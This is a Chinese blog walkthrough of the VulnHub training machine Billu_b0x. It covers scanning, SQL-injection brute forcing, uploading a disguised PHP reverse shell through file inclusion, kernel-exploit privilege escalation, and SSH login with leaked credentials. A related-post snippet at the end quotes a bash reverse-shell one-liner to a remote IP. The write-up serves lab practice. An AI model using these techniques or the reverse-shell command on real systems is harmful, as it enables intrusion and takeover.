vulnhub——BILLU: B0X

最新推荐文章于 2023-04-16 20:21:37 发布
最新推荐文章于 2023-04-16 20:21:37 发布
阅读量384 收藏 1
点赞数
分类专栏: Vulnhub 文章标签: linux 运维 服务器 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54431413/article/details/125055473
版权

目录

一、主机发现

二、端口扫描

三、服务版本

四、信息收集

五、burp的sql注入

1.使用方法

2.字典选择

3.结果

六、登录信息收集

七、文件上传

八、信息收集——目录爆破

1.add和add.php

 2.抓取数据包

3.验证猜想

4.文件包含利用

5.拿到shell

6.python升级shell

九、内核漏洞提权

1.查看内核版本

2.searchspolit

 3.利用

 第二种思路

一、信息收集

1.目录爆破

(1)phpmyadmin

(2)/in

(3)test

(4)具有文件下载漏洞

二、文件下载查看所有已知文件

 1. c.php

2.登录phpmyadmin

3.信息收集

4.config.inc.php

 三、ssh登录

一、主机发现

sudo arp-scan -l

二、端口扫描

sudo nmap -Pn 1-65535  192.168.43.120

三、服务版本

sudo nmap -p22,80 -sV -sC  192.168.43.120

四、信息收集

访问80端口,直接提示有SQL注入漏洞。

五、burp的sql注入

利用burpsuite的爆破模块加入字典,来进行sql注入 ,un是参数1,ps是参数2

1.使用方法

cluster bomb集束炸弹 穷举法,对我们标记的两个参数进行笛卡尔乘积形式的爆破

2.字典选择

用户名:/usr/share/seclists/Fuzzing/SQLi/Generic-SQLi.txt

参数2密码 选择burpsuite的payload里自带的sql字典即可

3.结果

我们会发现在payload为这些的时候页面返回了成功的结果

这是成功时的数据包

六、登录信息收集

两个选项show user展示用户 二添加1用户,在添加用户里可以进行上传文件。自然想到文件上传

七、文件上传

 利用kali中反弹shell的php文件

路径:/usr/share/webshells/php/php-reverse-shell.php

这里提示,仅允许上传图片格式文件,源代码中估计是个白名单,白名单利用方式很有局限性,要配合文件包含漏洞。这里我们先进行上传。

改下后缀名,加个图片头即可成功上传。但是我们无法成功利用,当前页面下信息有限。

八、信息收集——目录爆破

爆破出来很多目录一 一查看。

 

1.add和add.php

这里我们发现add和add.php和80端口页面的上传框相同,可以猜测后端页面调用了add.php文件。

 2.抓取数据包

可以看到load参数是add,改掉之后发现没有上传框出现,这里基本可以验证我们的猜想。尝试是否有文件包含的漏洞。

3.验证猜想

成功读取/etc/passwd

4.文件包含利用

文件包含漏洞因为include函数可以将文件当做php代码来执行。我们之前上传了一个图片马,查看上传路径,利用文件包含来执行它

5.拿到shell

6.python升级shell

九、内核漏洞提权

1.查看内核版本

uname -a

2.searchspolit

searchsploit 3.13.0

 3.利用

提权成功。

 第二种思路

一、信息收集

在目录爆破时我们看到还有很多路径

1.目录爆破

(1)phpmyadmin

(2)/in

phpinfo界面

(3)test

(4)具有文件下载漏洞

二、文件下载查看所有已知文件

 1. c.php

查看了所有已知文件,c.php里面有连接数据库的账号和密码

2.登录phpmyadmin

 也没有太多的有用信息。我们知道phpmy是个目录,对它继续进行目录扫描

3.信息收集

phpmy下有很多文件,挨个查看,收集有用信息

4.config.inc.php

 在这个文件下,,我们看到了root,roottoor,尝试ssh登录,直接拿到root权限

 三、ssh登录

直接拿到root权限。

 

梅_花_七
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
红队打靶:billu_b0x打靶思路详解(vulnhub
Bossfrank的博客
07-17 1911
本文是vulhub靶机bulli_b0x的详细打靶过程,涉及到的知识点包括SQL注入、文件包含漏洞利用、php代码审计、图片马的制作等。靶机不难,但细节很多,信息搜集是关键!细节包括使用POST的方法寻找文件包含的漏洞参数、读取index.php的源码确定sql注入的逻辑、上传图片马、找到触发图片马执行的路径、反弹shell的指令要进行url编码、敏感文件搜索碰撞数据库密码与ssh账号密码等等。
vulnhub(billu_b0x)实验
m0_49336519的博客
09-16 251
vulnhub(billu_b0x)实验 环境搭建 靶机下载地址 https://download.vulnhub.com/billu/Billu_b0x.zip 环境配置 1.靶机(billu_box) 2.攻击机(kali,win7) 3.靶机和攻击机都设置NAT模式 攻击演示 获取靶机IP 使用nmap扫描NAT网段上线的主机:nmap -sP 192.168.1.0/24 端口扫描 通过端口扫描发现服务器开放的服务信息 访问web站点 发现sql注入(靶机提示) sql注入测试 1.通过
Billu_b0x
PromisingQ
04-01 3427
完整过程 开启虚拟机用kali扫了半天没扫到,还以为环境有问题…最后发现是网络模式设置的仅主机…改成net以后,nmap -sP 192.168.144.1/24 nmap -p 1-655535 -sV 192.168.144.144 访问80端口 很明显登录框,尝试SQL注入,直接上最高等级,不过还是未果sqlmap -r post.txt --level=5 --risk=3 然后就扫一下目录呗, (字典太大,而且有重复,扫了一个小时,需要优化…) 经过筛选,发现5个可疑的地址: http://
vulnhub靶机 -- billu: b0x
weixin_46107179的博客
05-11 319
靶机下载地址:下载地址 搭建好环境,进行主机发现靶机的ip地址为192.168.137.147 对其进行nmap扫描,进行端口发现(22,80) 访问80端口,发现是一个登录框,叫我们尝试SQL注入,用简单的弱口令以及sqlmap跑不出来,然后尝试用burp的SQL字典来跑,跑出来了; 这里通过抓包,将其需要爆破的账号密码添加字典,并且选择cluster bomb模式 第一个字典可以选择kali里面自带的Fuzzing里面的SQL字典 第二个字典,可以就用burp自带的字典,自己添加一下键盘上的所有可
【渗透测试】通过实战教你通关Billu_b0x靶机
Monsterlz123的博客
07-10 1437
【渗透测试】通过实战教你通关Billu_b0x靶机 Hello,各位小伙伴大家好 这里是你们的小编Monster~ 话说提升技术很好的一个方法,就是去通关各种靶机 上周通关了一个靶机Billu_b0x,从中学到了很多东西,因此赶紧记录下来。 大家来跟我一起看看吧~ 实验拓扑: 靶机下载链接:https://download.vulnhub.com/billu/ 一、信息收集 1、IP与端...
vulnhub渗透系列之Billu_b0x
来到了学渣的博客
01-31 1669
我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。 建议 关于vulnhub的靶机,我建议vmbox和vmware两个容器可以切换着来用,有时候vmbox装载靶机之后可能没有IP映射出来,导致你发现不了靶机的地址。当你搞了很久,切换配置Nat或桥接网卡也无法成功时,我建议直接用vmware作为靶机的容器。说...
billu-b0x靶场渗透
最新发布
11-14
billu-b0x靶场渗透
靶机练习之Billu_b0x
10-04
通过该靶场,能够初步了解web渗透的基本流程。小白在了解了web各种漏洞原理,之后,可以练习一下该靶场,靶场做法很多。我也是一个小白,来这里记录一下学习的过程,不喜勿喷!!!感谢!!!
Vulnhub-CTF-Writeups:此备忘单针对CTF玩家和初学者,以帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章
05-28
Vulnhub-CTF-Writeups ...比卢:B0x 莫里亚1.1 Lazysys管理员 斗牛犬 BTRSys:DV 2.1 BTRSys 1 难以置信地容易 狄娜 Born2Root G0rmint 基本渗透 BSides Vancuver:2018年 Toppo:1 Billu Box 2 基
VMware-ovftool-4.4.0-15722219-win.x86_64.rar
05-03
《VMware ovftool在虚拟化管理中的应用与问题解析》 VMware ovftool,全称为OVF Tool,是一款由VMware公司推出的强大工具,主要用于处理OVF(Open Virtualization Format)和OVA(OVF Archive)文件,是虚拟化环境...
[VulnHub靶机渗透]一:billu_b0x
qq_45927819的博客
03-06 2884
文章目录实验环境实验步骤一、信息收集1.1 扫描主机所在网段进行主机发现1.2 端口扫描1.3 网站指纹信息扫描(whatweb)1.4 dirb爆破Web目录二、web渗透2.1 ssh爆破并获取shell2.2 web站点渗透2.2.1 index.php(登陆界面)2.2.2 add.php (空壳文件)2.2.3 test.php(文件包含可利用)2.2.4 phpmy (phpmyadmin)补充:2.2.5 phpmyadmin挂马2.2.5.1 利用outfile写文件挂马**2.2.5.2
Vulnhub靶机笔记01——Billu_b0x
2301_76329510的博客
04-16 1270
test。
靶机练习-1:billu_b0X
yifujiadeng的博客
01-12 1129
靶机练习-1:billu_b0X 环境准备: Billu_b0x,VMware虚拟机设置为nat模式,靶机自动获取ip地址 kali linux 2020虚拟机,ip地址192.168.1.137 渗透步骤: 信息收集: 1.ip发现 nmap -sP 192.168.1.0/24 使用nmap扫描本网段主机,其中192.168.1.1为网卡地址,192.168.1.3为网关,137为本机地址, 目标靶机ip为192.168.1.132 或者使用命令arp-scan -l扫描,效果相同,且不扫描本机
靶机渗透【billu_b0x
学信安技术 卫国家之门
01-10 7279
文章目录*一. billu_b0x 靶机安装*1. 靶机下载2. 开启靶机*二. billu_b0x 靶机渗透*1. 信息收集2. Web渗透3. 反弹shell4. 提权 一. billu_b0x 靶机安装 1. 靶机下载 百度网盘链接提取码 billu_b0x.rar 提取码:8whr 2. 开启靶机 打开 VMware,在左上角选择 - - 文件 - - 打开 找到 billu_b0x 靶机解压位置 开启后如图所示 二. billu_b0x 靶机渗透 开启一台 Kali
Billu_b0x的渗透测试
Cper的博客
10-26 557
靶场的测试实践和不同思路
Billu_b0x渗透总结
qq_45300786的博客
06-05 4628
Billu_b0x这个靶机也是断断续续的才做完,途中遇到了很多不懂的,但是这也表明进步的空间很大,这个靶机很适合我们这种初级的学习者,其中不乏趣味性,也有点难度,但总体思路是清晰的,有兴趣的同学不妨试试。 1.主机发现 arp-scan -l 或者 nmap -sn 192.168.223.0/24 -oG - 2.端口扫描 nmap -sS 192.168.223.132 或者 nmap -sS -A -Pn -p- -n 192.168.223.132 或者 nmap 192.168.223.0/24
Vulnhub靶场渗透Billu_box
paidx0
09-10 289
靶机说明 难度中等 目标:从web应用程序获得 root权限 运行环境:靶机ip(192.168.110.127)攻击机kali(192.168.110.128) 信息收集 常规简单的端口扫描,目录扫描 漏洞挖掘 访问 80端口,打开提示是 SQL注入 简单万能密码试了一下不行,丢sqlmap也没跑出来暂时就不管他了 把上面扫出来的目录挨个打开 in.php 里面是 phpinfo() add.php 是一个上传页面 phpmy 是 phpmyadmin登录页 test.php 是一个 测试页面,存
vulnhub-Billu_b0x(getshell成功)
qq_43006864的博客
03-29 1680
这一篇是接上一篇,上一篇没getshell。后面查了原因。然后紧跟 上面一篇文章开始。 开始弹shell。这里用到的命令。echo “bash -i >& /dev/tcp/192.168.1.113/4321 0>&1“ | bash 需进行url编码,这里我使用小火狐进行编码,之前用站长工具能在线编码会出现头尾无法编码的现象, 编码后 :%65%63%68%6f%20%22%62%61%73%68%20%2d%69%20%3e%26%2...
vulnhub-Billu_b0x
qq_43006864的博客
03-27 798
题目:Billu_b0x 攻击机:kali-linux ip地址: 靶机:vulnhub-Billu_b0x 开始解题: 一、信息收集: nmap获取目标主机信息: 这一步主要获取目标主机的端口信息等,先对整段进行扫描。 这里刚开始没注意,靶机默认的事nat模式,我扫了半天一直扫不出来,大家做的时候注意一下。 这里看到103这里开了22和80端口,基本确定是靶机了。再进一步探测端口信息。 nmap -sS -sV -A -p- 192.168.1.103 出
(Vulnhub练习)-- billu: b0x渗透实战
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
09-28 379
(Vulnhub练习)-- billu: b0x渗透实战 下载地址 http://www.vulnhub.com/entry/billu-b0x,188/ 扫描主机 netdiscover -i eth0 -r 192.168.100.0/24 目标主机IP:192.168.100.156 信息收集 信息收集的步骤基本上差不多,可根据工具简单写个shell脚本 #!/usr/bin/bash ip=192.168.100.$1 ping -c2 $ip &>/dev/null

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

梅_花_七

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值